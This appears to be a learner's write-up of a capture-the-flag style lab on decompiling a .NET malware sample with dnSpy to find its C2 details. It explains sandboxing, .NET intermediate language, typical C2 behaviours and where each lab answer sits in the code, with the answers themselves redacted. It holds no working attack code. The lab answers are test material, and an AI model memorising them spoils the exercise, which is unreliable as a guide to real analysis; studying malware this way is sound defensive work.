We are tasked by analysing a C2’s back-end infrastructure based on a malware’s source code.
Learning Objectives #
- The foundations of analysing malware samples safely.
- The fundamentals of .NET binaries.
- The
dnSpytool for decompiling malware samples written in .NET - Building an essential methodology for analysing malware source code
Overview #
Handling a malware sample is dangerous. Always take precations during your analysis.
A typical environment setup of a malware sandbox:
- Network controls: Limit and monitor the network traffic.
- Virtualisation: VMware, VirtualBox, Hyper-V. Can run the malware in a controlled, isolated environment. Allows for easy snapshots, resets and disposal after the analysis.
- Monitoring and logging: Sandboxes record detailed logs of the malware’s activites. The logs are invaluable for analysing and understanding the malware’s behaviour.
This is my key takeaways from today:
dnSpyis an easy tool to use to decompile and look at the source code for .NET applications.- When analysing a malware, look at the functions before the main to get a better understanding of what everything does.
Introduction to .NET Compiled Binaries #
.NET binaries are compiled files containing code written in languages comatible with the .NET framework (C#, VB.NET, F# etc.). These files are executable files (.exe) or dynamic link libraries (.dll).
Compared to other languages like C, languages that use .NET don’t directly translate the code into machine code after compilation. Instead they use an intermediate language (IL, like pseudocode) and translate it into native machine code during runtime via a Common Language Runtime (CLR).
It’s only possible to analyse a C or C++ compiled binary by reading its assembly instructions (low-level).
C# binary can be decompiled and its source code retrived.
C2 #
Malware with C2 capabilities typically exhibits the following behaviours:
- HTTP requests: C2 servers often communicate with victims using HTTP(s) requests. Can be used to send commands or receive data.
- Command execution: This is the most common, allowing attackers to execute OS commands inside the machine.
- Sleep or delay: To evade detection and be stealthy. Malware is often instructed to enter a sleep or delay for a specific period.
dnSpy, decompile malware #
dnSpy is an open-source .NET assembly (C#) debugger and editor. Typically used for reverse engineering .NET applications and analysing the code.
Can also edit the code, set breakpoints or running through the code one step at a time (debugging).
The main function is where the program starts.
Inside it are several functions that can be seen to the left in dnSpy in the Assembly Explorer.
Questions #
- What HTTP User-Agent was used by the malware for its connection requests to the C2 server?
Found inside the GetIt function.
- What is the HTTP method used to submit the command execution output?
To submit information to a server, we use the POST method. (Basic information in web requests, nothing special in this C2).
- What key is used by the malware to encrypt or decrypt the C2 data?
Found inside the Encryptor and Decryptor functions.
- What is the first HTTP URL used by the malware?
Found inside the main function, variable str.
- How many seconds is the hardcoded value used by the sleep function?
Found inside the main function, variable count.
This is written in miliseconds and need to be converted by dividing the value with 1000.
print(REDACTED/1000)
- What is the C2 command the attacker uses to execute commands via cmd.exe?
Looking inside the for-loop for the ExecuteCommand function under main, find where the if-else for ExecuteCommand is.
(if (!(a == "REDACTED')) else ..[snip].. Program.ExecuteCommand)
- What is the domain used by the malware to download another binary?
Found inside the main function, at line 43 (in the implant).